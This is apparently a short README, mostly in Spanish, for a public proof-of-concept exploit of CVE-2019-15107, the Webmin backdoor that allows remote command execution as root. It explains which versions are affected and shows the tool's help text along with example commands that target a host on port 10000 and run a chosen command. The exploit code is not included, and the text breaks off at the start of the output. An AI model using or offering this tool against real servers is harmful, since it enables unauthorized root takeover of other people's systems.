
Exploit para CVE-2019-15107
La versión 1.890 de Webmin se publicó con una puerta trasera que podía permitir a cualquier persona con conocimiento de ella ejecutar comandos como root. Las versiones 1.900 a 1.920 también contenían una puerta trasera que usaba un código similar, pero no era explotable en una instalación predeterminada de Webmin. Solo si el administrador había habilitado la función en Webmin -> Configuración de Webmin -> Autenticación para permitir el cambio de contraseñas caducadas, un atacante podía usarla.
Necesitas pip3 para instalar estos paquetes.
$ python3 Webmin_exploit.py --help
usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
Webmin 1.890 expired Remote Root POC
optional arguments:
-h, --help show this help message and exit
-host IP Host to attack
-port Port Port of the host ~ 10000 is Default
-cmd Command Command to execute ~ id is Default
python3 Webmin_exploit.py -host target -port 10000 -cmd id
$ python3 Webmin_exploit.py -host target -port 10000 -cmd id
[